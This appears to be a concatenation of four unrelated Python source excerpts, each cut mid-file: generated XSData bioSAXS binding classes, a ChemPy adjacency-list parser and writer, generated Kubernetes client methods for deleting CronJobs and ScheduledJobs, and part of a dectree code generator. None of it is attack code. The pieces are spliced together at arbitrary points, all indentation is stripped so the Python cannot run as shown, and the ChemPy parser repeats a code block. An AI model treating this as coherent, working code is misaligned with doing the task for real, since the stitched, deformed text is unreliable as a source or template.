"Property for integratedImage",
)
# Methods and properties for the 'integratedCurve' attribute
def getIntegratedCurve(self):
return self._integratedCurve
def setIntegratedCurve(self, integratedCurve):
if integratedCurve is None:
self._integratedCurve = None
elif integratedCurve.__class__.__name__ == "XSDataFile":
self._integratedCurve = integratedCurve
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0.setIntegratedCurve argument is not XSDataFile but %s"
% integratedCurve.__class__.__name__
)
raise BaseException(strMessage)
def delIntegratedCurve(self):
self._integratedCurve = None
integratedCurve = property(
getIntegratedCurve,
setIntegratedCurve,
delIntegratedCurve,
"Property for integratedCurve",
)
# Methods and properties for the 'sample' attribute
def getSample(self):
return self._sample
def setSample(self, sample):
if sample is None:
self._sample = None
elif sample.__class__.__name__ == "XSDataBioSaxsSample":
self._sample = sample
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0.setSample argument is not XSDataBioSaxsSample but %s"
% sample.__class__.__name__
)
raise BaseException(strMessage)
def delSample(self):
self._sample = None
sample = property(getSample, setSample, delSample, "Property for sample")
# Methods and properties for the 'experimentSetup' attribute
def getExperimentSetup(self):
return self._experimentSetup
def setExperimentSetup(self, experimentSetup):
if experimentSetup is None:
self._experimentSetup = None
elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
self._experimentSetup = experimentSetup
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAsciiExportv1_0.setExperimentSetup argument is not XSDataBioSaxsExperimentSetup but %s"
% experimentSetup.__class__.__name__
)
raise BaseException(strMessage)
def delExperimentSetup(self):
self._experimentSetup = None
experimentSetup = property(
getExperimentSetup,
setExperimentSetup,
delExperimentSetup,
"Property for experimentSetup",
)
def export(self, outfile, level, name_="XSDataInputBioSaxsAsciiExportv1_0"):
showIndent(outfile, level)
outfile.write(unicode("<%s>\n" % name_))
self.exportChildren(outfile, level + 1, name_)
showIndent(outfile, level)
outfile.write(unicode("</%s>\n" % name_))
def exportChildren(self, outfile, level, name_="XSDataInputBioSaxsAsciiExportv1_0"):
XSDataInput.exportChildren(self, outfile, level, name_)
if self._integratedImage is not None:
self.integratedImage.export(outfile, level, name_="integratedImage")
else:
warnEmptyAttribute("integratedImage", "XSDataImage")
if self._integratedCurve is not None:
self.integratedCurve.export(outfile, level, name_="integratedCurve")
else:
warnEmptyAttribute("integratedCurve", "XSDataFile")
if self._sample is not None:
self.sample.export(outfile, level, name_="sample")
if self._experimentSetup is not None:
self.experimentSetup.export(outfile, level, name_="experimentSetup")
def build(self, node_):
for child_ in node_.childNodes:
nodeName_ = child_.nodeName.split(":")[-1]
self.buildChildren(child_, nodeName_)
def buildChildren(self, child_, nodeName_):
if child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "integratedImage":
obj_ = XSDataImage()
obj_.build(child_)
self.setIntegratedImage(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "integratedCurve":
obj_ = XSDataFile()
obj_.build(child_)
self.setIntegratedCurve(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "sample":
obj_ = XSDataBioSaxsSample()
obj_.build(child_)
self.setSample(obj_)
elif child_.nodeType == Node.ELEMENT_NODE and nodeName_ == "experimentSetup":
obj_ = XSDataBioSaxsExperimentSetup()
obj_.build(child_)
self.setExperimentSetup(obj_)
XSDataInput.buildChildren(self, child_, nodeName_)
# Method for marshalling an object
def marshal(self):
oStreamString = StringIO()
oStreamString.write(unicode('<?xml version="1.0" ?>\n'))
self.export(oStreamString, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
oStringXML = oStreamString.getvalue()
oStreamString.close()
return oStringXML
# Only to export the entire XML tree to a file stream on disk
def exportToFile(self, _outfileName):
outfile = open(_outfileName, "w")
outfile.write(unicode('<?xml version="1.0" ?>\n'))
self.export(outfile, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
outfile.close()
# Deprecated method, replaced by exportToFile
def outputFile(self, _outfileName):
print(
"WARNING: Method outputFile in class XSDataInputBioSaxsAsciiExportv1_0 is deprecated, please use instead exportToFile!"
)
self.exportToFile(_outfileName)
# Method for making a copy in a new instance
def copy(self):
return XSDataInputBioSaxsAsciiExportv1_0.parseString(self.marshal())
# Static method for parsing a string
def parseString(_inString):
doc = minidom.parseString(_inString)
rootNode = doc.documentElement
rootObj = XSDataInputBioSaxsAsciiExportv1_0()
rootObj.build(rootNode)
# Check that all minOccurs are obeyed by marshalling the created object
oStreamString = StringIO()
rootObj.export(oStreamString, 0, name_="XSDataInputBioSaxsAsciiExportv1_0")
oStreamString.close()
return rootObj
parseString = staticmethod(parseString)
# Static method for parsing a file
def parseFile(_inFilePath):
doc = minidom.parse(_inFilePath)
rootNode = doc.documentElement
rootObj = XSDataInputBioSaxsAsciiExportv1_0()
rootObj.build(rootNode)
return rootObj
parseFile = staticmethod(parseFile)
# end class XSDataInputBioSaxsAsciiExportv1_0
class XSDataInputBioSaxsAzimutIntv1_0(XSDataInput):
def __init__(
self,
configuration=None,
experimentSetup=None,
sample=None,
correctedImage=None,
integratedCurve=None,
integratedImage=None,
normalizedImageSize=None,
normalizedImage=None,
):
XSDataInput.__init__(self, configuration)
if normalizedImage is None:
self._normalizedImage = None
elif normalizedImage.__class__.__name__ == "XSDataImage":
self._normalizedImage = normalizedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'normalizedImage' is not XSDataImage but %s"
% self._normalizedImage.__class__.__name__
)
raise BaseException(strMessage)
if normalizedImageSize is None:
self._normalizedImageSize = None
elif normalizedImageSize.__class__.__name__ == "XSDataInteger":
self._normalizedImageSize = normalizedImageSize
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'normalizedImageSize' is not XSDataInteger but %s"
% self._normalizedImageSize.__class__.__name__
)
raise BaseException(strMessage)
if integratedImage is None:
self._integratedImage = None
elif integratedImage.__class__.__name__ == "XSDataImage":
self._integratedImage = integratedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'integratedImage' is not XSDataImage but %s"
% self._integratedImage.__class__.__name__
)
raise BaseException(strMessage)
if integratedCurve is None:
self._integratedCurve = None
elif integratedCurve.__class__.__name__ == "XSDataFile":
self._integratedCurve = integratedCurve
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'integratedCurve' is not XSDataFile but %s"
% self._integratedCurve.__class__.__name__
)
raise BaseException(strMessage)
if correctedImage is None:
self._correctedImage = None
elif correctedImage.__class__.__name__ == "XSDataImage":
self._correctedImage = correctedImage
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'correctedImage' is not XSDataImage but %s"
% self._correctedImage.__class__.__name__
)
raise BaseException(strMessage)
if sample is None:
self._sample = None
elif sample.__class__.__name__ == "XSDataBioSaxsSample":
self._sample = sample
else:
strMessage = (
"ERROR! XSDataInputBioSaxsAzimutIntv1_0 constructor argument 'sample' is not XSDataBioSaxsSample but %s"
% self._sample.__class__.__name__
)
raise BaseException(strMessage)
if experimentSetup is None:
self._experimentSetup = None
elif experimentSetup.__class__.__name__ == "XSDataBioSaxsExperimentSetup":
self._experimentSetup = experimentSetup
else:
strMessage = (
"ERROR! | |
#!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# ChemPy - A chemistry toolkit for Python
#
# Copyright (c) 2012 by <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains functionality for reading from and writing to the
adjacency list format used by Reaction Mechanism Generator (RMG).
"""
import re
from .molecule import Atom, Bond
from .group import GroupAtom, GroupBond
#import chempy.molecule.atomtype as atomtypes
################################################################################
class InvalidAdjacencyListError(Exception):
"""
An exception used to indicate that an RMG-style adjacency list is invalid.
Pass a string describing the reason the adjacency list is invalid
"""
pass
################################################################################
def fromAdjacencyList(adjlist, group=False):
"""
Convert a string adjacency list `adjlist` into a set of :class:`Atom` and
:class:`Bond` objects.
"""
atoms = []
atomdict = {}
bonds = {}
try:
adjlist = adjlist.strip()
lines = adjlist.splitlines()
if adjlist == '' or len(lines) == 0:
raise InvalidAdjacencyListError('Empty adjacency list.')
# Skip the first line if it contains a label
if len(lines[0].split()) == 1:
label = lines.pop(0)
if len(lines) == 0:
raise InvalidAdjacencyListError('No atoms specified in adjacency list.')
mistake1 = re.compile('\{[^}]*\s+[^}]*\}')
# Iterate over the remaining lines, generating Atom or GroupAtom objects
for line in lines:
# Sometimes people put spaces after commas, which messes up the
# parse-by-whitespace. Examples include '{Cd, Ct}'.
if mistake1.search(line):
raise InvalidAdjacencyListError(
"Shouldn't have spaces inside braces: {0}".format(mistake1.search(line).group())
)
# Sometimes commas are used to delimit bonds in the bond list,
# so replace them just in case
line = line.replace('},{', '} {')
data = line.split()
# Skip if blank line
if len(data) == 0: continue
# First item is index for atom
# Sometimes these have a trailing period (as if in a numbered list),
# so remove it just in case
aid = int(data[0].strip('.'))
# If second item starts with '*', then atom is labeled
label = ''; index = 1
if data[1][0] == '*':
label = data[1]
index += 1
# Next is the element or functional group element
# A list can be specified with the {,} syntax
atomType = data[index]
if atomType[0] == '{':
atomType = atomType[1:-1].split(',')
else:
atomType = [atomType]
# Next is the element or atom type
# A list can be specified with the {,} syntax
atomType = data[index]
if atomType[0] == '{':
atomType = atomType[1:-1].split(',')
else:
atomType = [atomType]
index += 1
# Next is the electron state
radicalElectrons = []; spinMultiplicity = []
elecState = data[index].upper()
if elecState[0] == '{':
elecState = elecState[1:-1].split(',')
else:
elecState = [elecState]
for e in elecState:
if e == '0':
radicalElectrons.append(0); spinMultiplicity.append(1)
elif e == '1':
radicalElectrons.append(1); spinMultiplicity.append(2)
elif e == '2':
radicalElectrons.append(2); spinMultiplicity.append(1)
radicalElectrons.append(2); spinMultiplicity.append(3)
elif e == '2S':
radicalElectrons.append(2); spinMultiplicity.append(1)
elif e == '2T':
radicalElectrons.append(2); spinMultiplicity.append(3)
elif e == '3':
radicalElectrons.append(3); spinMultiplicity.append(4)
elif e == '4':
radicalElectrons.append(4); spinMultiplicity.append(5)
index += 1
# Create a new atom based on the above information
if group:
atom = GroupAtom(atomType, radicalElectrons, spinMultiplicity, [0 for e in radicalElectrons], label)
else:
atom = Atom(atomType[0], radicalElectrons[0], spinMultiplicity[0], 0, label)
# Add the atom to the list
atoms.append(atom)
atomdict[aid] = atom
# Process list of bonds
bonds[aid] = {}
for datum in data[index:]:
# Sometimes commas are used to delimit bonds in the bond list,
# so strip them just in case
datum = datum.strip(',')
aid2, comma, order = datum[1:-1].partition(',')
aid2 = int(aid2)
if aid == aid2:
raise InvalidAdjacencyListError('Attempted to create a bond between atom {0:d} and itself.'.format(aid))
if order[0] == '{':
order = order[1:-1].split(',')
else:
order = [order]
bonds[aid][aid2] = order
# Check consistency using bonddict
for atom1 in bonds:
for atom2 in bonds[atom1]:
if atom2 not in bonds:
raise InvalidAdjacencyListError('Atom {0:d} not in bond dictionary.'.format(atom2))
elif atom1 not in bonds[atom2]:
raise InvalidAdjacencyListError('Found bond between {0:d} and {1:d}, but not the reverse.'.format(atom1, atom2))
elif bonds[atom1][atom2] != bonds[atom2][atom1]:
raise InvalidAdjacencyListError('Found bonds between {0:d} and {1:d}, but of different orders "{2}" and "{3}".'.format(atom1, atom2, bonds[atom1][atom2], bonds[atom2][atom1]))
# Convert bonddict to use Atom[group] and Bond[group] objects
atomkeys = atomdict.keys()
atomkeys.sort()
for aid1 in atomkeys:
atomkeys2 = bonds[aid1].keys()
atomkeys2.sort()
for aid2 in atomkeys2:
if aid1 < aid2:
atom1 = atomdict[aid1]
atom2 = atomdict[aid2]
order = bonds[aid1][aid2]
if group:
bond = GroupBond(atom1, atom2, order)
elif len(order) == 1:
bond = Bond(atom1, atom2, order[0])
else:
raise InvalidAdjacencyListError('Multiple bond orders specified for an atom in a Molecule.')
atom1.edges[atom2] = bond
atom2.edges[atom1] = bond
# Add explicit hydrogen atoms to complete structure if desired
if not group:
valences = {'H': 1, 'C': 4, 'O': 2, 'N': 3, 'S': 2, 'Si': 4, 'He': 0, 'Ne': 0, 'Ar': 0, 'Cl': 1}
orders = {'S': 1, 'D': 2, 'T': 3, 'B': 1.5}
newAtoms = []
for atom in atoms:
try:
valence = valences[atom.symbol]
except KeyError:
raise InvalidAdjacencyListError('Cannot add hydrogens to adjacency list: Unknown valence for atom "{0}".'.format(atom.symbol))
radical = atom.radicalElectrons
order = 0
for atom2, bond in atom.bonds.items():
order += orders[bond.order]
count = valence - radical - int(order)
for i in range(count):
a = Atom('H', 0, 1, 0, '')
b = Bond(atom, a, 'S')
newAtoms.append(a)
atom.bonds[a] = b
a.bonds[atom] = b
atoms.extend(newAtoms)
except InvalidAdjacencyListError:
print adjlist
raise
return atoms
################################################################################
def getElectronState(radicalElectrons, spinMultiplicity):
"""
Return the electron state corresponding to the given number of radical
electrons `radicalElectrons` and spin multiplicity `spinMultiplicity`.
Raise a :class:`ValueError` if the electron state cannot be determined.
"""
electronState = ''
if radicalElectrons == 0:
electronState = '0'
elif radicalElectrons == 1:
electronState = '1'
elif radicalElectrons == 2 and spinMultiplicity == 1:
electronState = '2S'
elif radicalElectrons == 2 and spinMultiplicity == 3:
electronState = '2T'
elif radicalElectrons == 3:
electronState = '3'
elif radicalElectrons == 4:
electronState = '4'
else:
raise ValueError('Unable to determine electron state for {0:d} radical electrons with spin multiplicity of {1:d}.'.format(radicalElectrons, spinMultiplicity))
return electronState
def toAdjacencyList(atoms, label=None, group=False, removeH=False):
"""
Convert a chemical graph defined by a list of `atoms` into a string
adjacency list.
"""
adjlist = ''
# Don't remove hydrogen atoms if the molecule consists only of hydrogen atoms
try:
if removeH and all([atom.element.symbol == 'H' for atom in atoms]): removeH = False
except AttributeError:
pass
if label: adjlist += label + '\n'
# Determine the numbers to use for each atom
atomNumbers = {}
index = 0
for atom in atoms:
if removeH and atom.element.symbol == 'H' and atom.label == '': continue
atomNumbers[atom] = '{0:d}'.format(index + 1)
index += 1
atomLabels = dict([(atom, '{0}'.format(atom.label)) for atom in atomNumbers])
atomTypes = {}
atomElectronStates = {}
if group:
for atom in atomNumbers:
# Atom type(s)
if len(atom.atomType) == 1:
atomTypes[atom] = atom.atomType[0].label
else:
atomTypes[atom] = '{{{0}}}'.format(','.join([a.label for a in atom.atomType]))
# Electron state(s)
if len(atom.radicalElectrons) == 1:
atomElectronStates[atom] = getElectronState(atom.radicalElectrons[0], atom.spinMultiplicity[0])
else:
atomElectronStates[atom] = '{{{0}}}'.format(','.join([getElectronState(radical, spin) for radical, spin in zip(atom.radicalElectrons, atom.spinMultiplicity)]))
else:
for atom in atomNumbers:
# Atom type
atomTypes[atom] = '{0}'.format(atom.element.symbol)
# Electron state(s)
atomElectronStates[atom] = '{0}'.format(getElectronState(atom.radicalElectrons, atom.spinMultiplicity))
# Determine field widths
atomNumberWidth = max([len(s) | |
existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_cron_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_cron_job_with_http_info(name, namespace, body, **kwargs)
return data
def delete_namespaced_cron_job_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a CronJob
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_cron_job_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CronJob (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_cron_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_cron_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_cron_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_cron_job`")
collection_formats = {}
resource_path = '/apis/batch/v2alpha1/namespaces/{namespace}/cronjobs/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
if 'propagation_policy' in params:
query_params['propagationPolicy'] = params['propagation_policy']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_scheduled_job(self, name, namespace, body, **kwargs):
"""
delete a ScheduledJob
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_scheduled_job(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the ScheduledJob (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, **kwargs)
return data
def delete_namespaced_scheduled_job_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a ScheduledJob
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_scheduled_job_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the ScheduledJob (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_scheduled_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_scheduled_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_scheduled_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_scheduled_job`")
collection_formats = {}
resource_path = '/apis/batch/v2alpha1/namespaces/{namespace}/scheduledjobs/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
if 'propagation_policy' in params:
query_params['propagationPolicy'] = params['propagation_policy']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
| |
import ast
from collections import OrderedDict
from io import StringIO
from typing import List, Dict, Any, Tuple, Optional
import dectree.propfuncs as propfuncs
from dectree.config import CONFIG_NAME_INPUTS_NAME, CONFIG_NAME_OUTPUTS_NAME, CONFIG_NAME_PARAMS_NAME
from .config import get_config_value, \
CONFIG_NAME_VECTORIZE, CONFIG_NAME_PARAMETERIZE, CONFIG_NAME_FUNCTION_NAME, CONFIG_NAME_TYPES, VECTORIZE_FUNC, \
VECTORIZE_PROP, CONFIG_NAME_OR_PATTERN, CONFIG_NAME_NOT_PATTERN, \
CONFIG_NAME_NO_JIT, VECTORIZE_NONE, CONFIG_NAME_AND_PATTERN
from .types import VarName, PropName, TypeName, PropDef, TypeDefs, VarDefs, PropFuncParamName
def gen_code(type_defs,
input_defs,
output_defs,
rules,
**options):
text_io = StringIO()
code_gen = CodeGen(type_defs, input_defs, output_defs, rules, text_io, options)
code_gen.gen_code()
return text_io.getvalue()
class CodeGen:
def __init__(self,
type_defs,
input_defs,
output_defs,
rules,
out_file,
options):
assert type_defs
assert input_defs
assert output_defs
assert rules
assert out_file
self.type_defs = type_defs
self.input_defs = input_defs
self.output_defs = output_defs
self.rules = rules
self.out_file = out_file
self.output_assignments = None
options = dict(options or {})
self.no_jit = get_config_value(options, CONFIG_NAME_NO_JIT)
self.vectorize = get_config_value(options, CONFIG_NAME_VECTORIZE)
self.parameterize = get_config_value(options, CONFIG_NAME_PARAMETERIZE)
self.function_name = get_config_value(options, CONFIG_NAME_FUNCTION_NAME)
self.inputs_name = get_config_value(options, CONFIG_NAME_INPUTS_NAME)
self.outputs_name = get_config_value(options, CONFIG_NAME_OUTPUTS_NAME)
self.params_name = get_config_value(options, CONFIG_NAME_PARAMS_NAME)
self.use_py_types = get_config_value(options, CONFIG_NAME_TYPES)
self.and_pattern = _get_config_op_pattern(options, CONFIG_NAME_AND_PATTERN)
self.or_pattern = _get_config_op_pattern(options, CONFIG_NAME_OR_PATTERN)
self.not_pattern = _get_config_op_pattern(options, CONFIG_NAME_NOT_PATTERN)
self.expr_gen = ExprGen(type_defs, input_defs,
parameterize=self.parameterize,
vectorize=self.vectorize,
no_jit=self.no_jit,
not_pattern=self.not_pattern,
and_pattern=self.and_pattern,
or_pattern=self.or_pattern)
def gen_code(self):
self.output_assignments = {}
self._write_imports()
self._write_type_prop_functions()
self._write_inputs_class()
self._write_outputs_class()
self._write_params()
self._write_apply_rules_function()
def _write_imports(self):
numba_import = 'from numba import jit, jitclass, float64'
numpy_import = 'import numpy as np'
if self.no_jit:
if self.vectorize == VECTORIZE_FUNC:
self._write_lines('', numpy_import)
else:
if self.vectorize == VECTORIZE_PROP:
self._write_lines('', numba_import + ', vectorize', numpy_import)
elif self.vectorize == VECTORIZE_FUNC:
self._write_lines('', numba_import, numpy_import)
else:
self._write_lines('', numba_import)
def _write_type_prop_functions(self):
numba_decorator = self._get_numba_decorator(prop_func=True)
for type_name, type_def in self.type_defs.items():
for prop_name, prop_def in type_def.items():
prop_value, func_params, func_body_pattern = prop_def
if self.parameterize and func_params:
func_header = 'def _{}_{}(x{}):'.format(type_name, prop_name, ', ' + ', '.join(func_params.keys()))
func_body = func_body_pattern.format(**{key: key for key in func_params.keys()})
else:
func_header = 'def _{}_{}(x):'.format(type_name, prop_name)
func_body = func_body_pattern.format(**func_params)
func_body_lines = map(lambda line: ' ' + str(line), func_body.split('\n'))
self._write_lines('', '',
numba_decorator,
func_header,
' # {}.{}: {}'.format(type_name, prop_name, prop_value),
*func_body_lines)
def _write_apply_rules_function(self):
if self.parameterize:
function_params = [('inputs', self.inputs_name),
('outputs', self.outputs_name),
('params', self.params_name)]
else:
function_params = [('inputs', self.inputs_name),
('outputs', self.outputs_name)]
if self.use_py_types:
function_args = ', '.join(['{}: {}'.format(param_name, param_type)
for param_name, param_type in function_params])
else:
function_args = ', '.join(['{}'.format(param_name)
for param_name, _ in function_params])
numba_decorator = self._get_numba_decorator()
self._write_lines('', '',
numba_decorator,
'def {}({}):'.format(self.function_name, function_args))
if self.vectorize == VECTORIZE_FUNC:
output_var = list(self.output_defs.keys())[0]
self._write_lines(' for i in range(len(outputs.{output_var})):'.format(output_var=output_var))
self._write_lines(' t0 = 1.0')
else:
self._write_lines(' t0 = 1.0')
for rule in self.rules:
self._write_rule(rule, 1, 1)
def _get_numba_decorator(self, prop_func=False):
if self.vectorize == VECTORIZE_PROP and prop_func:
numba_decorator = '@vectorize([float64(float64)])'
else:
numba_decorator = '@jit(nopython=True)'
if self.no_jit:
numba_decorator = '# ' + numba_decorator
return numba_decorator
def _write_inputs_class(self):
self._write_io_class(self.inputs_name, self.input_defs)
def _write_outputs_class(self):
self._write_io_class(self.outputs_name, self.output_defs)
def _write_io_class(self, class_name, var_defs):
self._write_class(class_name, var_defs.keys())
def _write_params(self):
if not self.parameterize:
return
param_names = []
param_values = {}
for type_name, type_def in self.type_defs.items():
for prop_name, prop_def in type_def.items():
prop_value, func_params, func_body = prop_def
for param_name, param_value in func_params.items():
qualified_param_name = _get_qualified_param_name(type_name, prop_name, param_name)
param_names.append(qualified_param_name)
param_values[qualified_param_name] = param_value
self._write_class(self.params_name, param_names, param_values)
# See http://numba.pydata.org/numba-doc/dev/user/jitclass.html
def _write_class(self, class_name, var_names, param_values: Optional[Dict[str, Any]] = None):
is_io = param_values is None
spec_name = '_{}Spec'.format(class_name)
spec_lines = ['{} = ['.format(spec_name)]
for var_name in var_names:
if param_values:
spec_lines.append(' ("{}", float64),'.format(var_name))
elif not self.no_jit and self.vectorize != VECTORIZE_NONE:
spec_lines.append(' ("{}", float64[:]),'.format(var_name))
else:
